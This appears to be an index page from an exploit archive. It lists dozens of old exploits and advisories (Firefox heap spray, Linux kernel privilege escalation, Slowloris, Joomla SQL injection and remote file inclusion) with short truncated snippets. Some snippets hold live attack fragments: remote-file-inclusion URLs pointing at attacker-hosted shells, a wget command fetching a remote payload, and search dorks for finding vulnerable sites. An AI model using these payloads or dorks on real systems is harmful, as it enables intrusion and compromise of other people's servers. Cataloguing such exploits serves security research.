Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow

Mozilla Firefox 3.5 OSX - Font Tags Remote Buffer Overflow !/usr/bin/env python FireFox 3.5 Heap Spray OS X Exploit Modified by: DrIDE Originally Discovered by: Simon Berry-Bryne Pythonized by: David Kennedy ReL1K @ SecureState Thanks to HDM Tested on OS X 10.5.7 from BaseHTTPServer import...

Linux Kernel 2.6.30 2.6.30.1 SELinux (RHEL 5) - Local Privilege Escalation

Linux Kernel 2.6.30 2.6.30.1 SELinux RHEL 5 - Local Privilege Escalation / super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But which, thanks to gcc optimizations, becomes exploitable : Also, bypass of...

Multiple HTTP Server - slowloris.pl Low Bandwidth Denial of Service

Multiple HTTP Server - slowloris.pl Low Bandwidth Denial of Service !/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG'PIPE' = 'IGNORE'; Ignore broken pipe errors print EOTEXT;...

Joomla! Component com_rsgallery2 1.14.x2.x - Remote Backdoor Access

Joomla! Component comrsgallery2 1.14.x2.x - Remote Backdoor Access Vulnerability: Remote code execution back doors Software: RSGallery2 - Gallery Extension for Joomla! We are currently working on a new website. All files are still available at the JoomlaCode project page. Severity: Not a big deal...

MiniTwitter 0.2b - Remote User Options Changer

MiniTwitter 0.2b - Remote User Options Changer || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ¡PROUD TO BE SPANISH!...

GnuTLS 2.6.x - libgnutls libpk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service

GnuTLS 2.6.x - libgnutls libpk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service // source: https://www.securityfocus.com/bid/34783/info GnuTLS is prone to multiple remote vulnerabilities: - A remote code-execution vulnerability - A denial-of-service vulnerability - A...

XRDP 0.4.1 - Remote Buffer Overflow (PoC)

XRDP 0.4.1 - Remote Buffer Overflow PoC / XRDP = 0.4.1 pre-auth remote PoC exploit. xrdp.sourceforge.net 01:59:56 root@crateria:/xrdp gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc 02:00:29 root@crateria:/xrdp ./xrdp-poc 10.0.0.13 = Connected to 10.0.0.13 = Hit CTRL-C if the progress bar stops. Be...

Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities

Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities Louhi Networks Oy -= Security Advisory =- Advisory: Rittal CMC-TC Processing Unit II multiple vulnerabilities Release Date: 2009-03-23 Last Modified: 2009-03-22 Authors: Henri Lindberg, CISA henri d0t lindberg at louhi d0t fi Application...

Enomaly ECP Enomalism 2.2.1 - Multiple Local Vulnerabilities

Enomaly ECP Enomalism 2.2.1 - Multiple Local Vulnerabilities Enomaly ECP/Enomalism: Multiple vulnerabilities in enomalism2.sh redux Synopsis All versions of Enomaly ECP/Enomalism1 before 2.2.1 have multiple issues relating to the use of temporary files in an insecure manner. Fixes for...

Emefa Guestbook 3.0 - Remote Database Disclosure

Emefa Guestbook 3.0 - Remote Database Disclosure Title: Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability Credit: Cyber.Zer0 E-mail: Cyber.Zer04tHotmaildotcom Download: http://www.emefa.dyndns.org/downloads/ Remote: Yes Dork: "Emefa Guestbook V 3.0" --=Database Disclosure=--...

Web Calendar System 3.40 - Cross-Site Scripting SQL Injection

Web Calendar System 3.40 - Cross-Site Scripting SQL Injection 000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0...

Joomla! Component Ignite Gallery 0.8.3 - SQL Injection

Joomla! Component Ignite Gallery 0.8.3 - SQL Injection Joomla Component Ignite Gallery SQL Injection Vulnerability Vulnerability found by: H!tm@N Contact: hitmanatkhg-crewdotws Site: www.khg-crew.ws Greetz: boom3rang, KHG, urtan, chs, redc00de - -=Kosova Hackers Group=- ScriptName: "Joomla"...

6rbScript 3.3 - singerid SQL Injection

6rbScript 3.3 - singerid SQL Injection || | | 6rbScript V3.3 singerid Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC | | email: darkangelg85atYahooDoTcom | | | | | | | | script :...

Reciprocal Links Manager 1.1 - site SQL Injection

Reciprocal Links Manager 1.1 - site SQL Injection || | | Reciprocal Links Manager 1.1 site Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.CoM | www.tryag.cc/cc | | email: darkangelg85atYahooDoTcom | | | | |...

Pligg CMS 9.9.5 - CAPTCHA Registration Automation Security Bypass

Pligg CMS 9.9.5 - CAPTCHA Registration Automation Security Bypass source: https://www.securityfocus.com/bid/30518/info Pligg is prone to a security-bypass weakness. Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead...

Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion

Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...

PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution

PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution Date: 02/07/08 Note I modified a bit phpsploit for this exploit, because PHP Nuke plays with REQUESTURI var ... Requirements registerglobals=On phpreter phpreter is really easy to use: You can change mode using "mode=", with = sql, php or cmd If...

SNMPv3 - HMAC Validation error Remote Authentication Bypass

SNMPv3 - HMAC Validation error Remote Authentication Bypass snmpv3exp.sh exploit the vulnerability described in CVE-2008-0960, the HMAC check problem on multiple vendor Copyright c 2008 @ Mediaservice.net Srl. All rights reserved Wrote by Maurizio Agazzini http://lab.mediaservice.net/...

C6 Messenger - ActiveX Remote Download and Execute

C6 Messenger - ActiveX Remote Download and Execute !-- C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit by Nine:Situations:Group::SnoopyAssault site: http://retrogod.altervista.org/ "C6 Messenger is an instant messaging program produced by Telecom Italia...

Creative Software AutoUpdate Engine - ActiveX Stack Overflow

Creative Software AutoUpdate Engine - ActiveX Stack Overflow +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably. Original Advisory @...

VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String

VideoLAN VLC Media Player 0.8.6d - httpdFileCallBack Remote Format String / Epibite // bite since 1442 pown meme ta mamie / / Advisory from Luigi Auriemma CVE-2007-6682 / format string in VideoLAN VLC 0.8.6d Description : Format string vulnerability in the httpdFileCallBack function network/httpd...

sCssBoard (Multiple Versions) - pwnpack Remote s

sCssBoard Multiple Versions - pwnpack Remote s !/usr/bin/ruby inphex - i didnt include all of those bugs into the code,this code basicly checks if the forum is vulnerable and also exploits SQL Injection bug! all versions on sourceforge seem to be the same ;\ so check is beeing done on each versio...

Rejetto HTTP File Server (HFS) 1.52.x - Multiple Vulnerabilities

Rejetto HTTP File Server HFS 1.52.x - Multiple Vulnerabilities source: https://www.securityfocus.com/bid/27423/info HFS HTTP File Server is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a...

PHP Webquest 2.6 - Get Database Credentials

PHP Webquest 2.6 - Get Database Credentials --==+================================================================================+==-- --==+ PHP Webquest 2.6 Get Database's Credential +==-- --==+================================================================================+==-- Author: MhZ91...

BadBlue 2.72 - PassThru Remote Buffer Overflow

BadBlue 2.72 - PassThru Remote Buffer Overflow !/usr/bin/perl -w http://aluigi.altervista.org/adv/badblue-adv.txt https://www.securityfocus.com/bid/26803 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379 exploit for stack overflow in badblue 2.72 Credit to Luigi Auriemma Jacopo Cervini...

EZContents 1.4.5 - index.php?link Remote File Disclosure

EZContents 1.4.5 - index.php?link Remote File Disclosure -------------------------------------------------------------- ezContents Version 1.4.5 Remote File Disclosure Vulnerability. -------------------------------------------------------------- download : http://www.visualshapers.com/ author :...

ht:Dig 3.2 - Htsearch Cross-Site Scripting

ht:Dig 3.2 - Htsearch Cross-Site Scripting source: https://www.securityfocus.com/bid/26610/info ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue allows an attacker to execute arbitrary HTML or script code...

nuseo PHP enterprise 1.6 - Remote File Inclusion

nuseo PHP enterprise 1.6 - Remote File Inclusion Vulnerability Type: Remote File Inclusion Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseoadmind.php Exploit URL:...

modifyform - modifyform.html Remote File Inclusion

modifyform - modifyform.html Remote File Inclusion modifyform RFI author: mozi original post: http://darkcode.h1x.com/forum/ dork: inurl: modifyform.html?code= thanks: str0ke, d3hydr8 milw0rm.com 2007-09-18...

ID Automation Linear Barcode - ActiveX Denial of Service

ID Automation Linear Barcode - ActiveX Denial of Service 2007/05/13 -------------------------------------------------------------------------------------------------- ID Automation Linear Barcode ActiveX Control IDAutomationLinear6.dll v. 1.6.0.5 DoS url: http://www.idautomation.com/ price: from...

Beacon 0.2.0 - splash.lang.php Remote File Inclusion

Beacon 0.2.0 - splash.lang.php Remote File Inclusion Beacon = 2.0Remot file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt?...

Microsoft Windows - Animated Cursor .ani Local Stack Overflow

Microsoft Windows - Animated Cursor .ani Local Stack Overflow / Copyright c 2007 devcode ^^ D E V C O D E ^^ Windows .ANI LoadAniIcon Stack Overflow CVE-2007-1765 Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to take complete...

KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting

KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize...

Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)

Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 2 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...

OpenDock Easy Blog 1.4 - doc_directory File Inclusion

OpenDock Easy Blog 1.4 - docdirectory File Inclusion ECHOADV50$2006 ----------------------------------------------------------------------------------------------- ECHOADV50$2006OpenDock Easy Blog =1.4 docdirectory Multiple Remote File Inclusion Vulnerability...

Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting

Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage...

PixelPost 1-5rc1-2 - Privilege Escalation

PixelPost 1-5rc1-2 - Privilege Escalation !/usr/bin/php -q -d shortopentag=on ? echo "Pixelpost = 1-5rc1-2 privilege escalation exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: pixelpost "RSS 2.0" "ATOM feed" "Valid xHTML / Valid...

EQdkp 1.3.0 - dbal.php Remote File Inclusion

EQdkp 1.3.0 - dbal.php Remote File Inclusion Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls...

SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)

SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow Metasploit This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core...

BlueCoat WinProxy 6.0 R1c - GET Denial of Service

BlueCoat WinProxy 6.0 R1c - GET Denial of Service !perl "WinProxy 6.0 R1c" Remote DoS Exploit Author: FistFucker e-Mail: [email protected] Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363 CVE info: CAN-2005-3187 use IO::Socket; destination IP address $ip =...

ATutor 1.4.3 - content.php?cid Cross-Site Scripting

ATutor 1.4.3 - content.php?cid Cross-Site Scripting source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of...

Webhints 1.03 - Remote Command Execution (Perl) (1)

Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...

PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting

PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/13628/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary scri...

paNews 2.0b4 - Remote Admin Creation SQL Injection

paNews 2.0b4 - Remote Admin Creation SQL Injection / paNews v2.0b4 silePNEWSxpl This exploit utilize SQL injection for create a new user with admin privileges on paNews software system. References: packetstormsecurity.org/0503-exploits/panews.txt coded by: Silentium of Anacron Group Italy date:...

CA License Server - GETCONFIG Remote Buffer Overflow

CA License Server - GETCONFIG Remote Buffer Overflow / Computer-Associates, License Service Stack Overflow Homepage: ca.com Affected version: v1.61 and below in eTrust, Unicenter, BrightStor, etc.. Patched version: hotfix Link: ca.com Date: 04 March 2005 Application Risk: Tsunami Internet Risk:...

D-Forum 1.11 - Nav.php3 Cross-Site Scripting

D-Forum 1.11 - Nav.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/12720/info D-Forum is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. As a result of this vulnerability, it is...

Star Wars Battlefront 1.1 - Fake Players Denial of Service

Star Wars Battlefront 1.1 - Fake Players Denial of Service / Copyright 2004 Luigi Auriemma This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at...

Dropbear SSH 0.34 - Remote Code Execution

Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...

Linux Kernel 2.2.252.4.242.6.2 - mremap() Local Privilege Escalation

Linux Kernel 2.2.252.4.242.6.2 - mremap Local Privilege Escalation / mremap missing domunmap return check kernel exploit gcc -O3 -static -fomit-frame-pointer mremappte.c -o mremappte ./mremappte suid shell Vulnerable kernel versions are all include include include include include include include...

RhinoSoft Serv-U FTPd Server 3.x4.x5.x - MDTM Remote Overflow

RhinoSoft Serv-U FTPd Server 3.x4.x5.x - MDTM Remote Overflow / exservu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit Copyright c SST 2004 All rights reserved. Public version BUG find by bkbll [email protected], cool! :ppPPppPPPpp :D code by Sam and 2004/01/07 Revise History...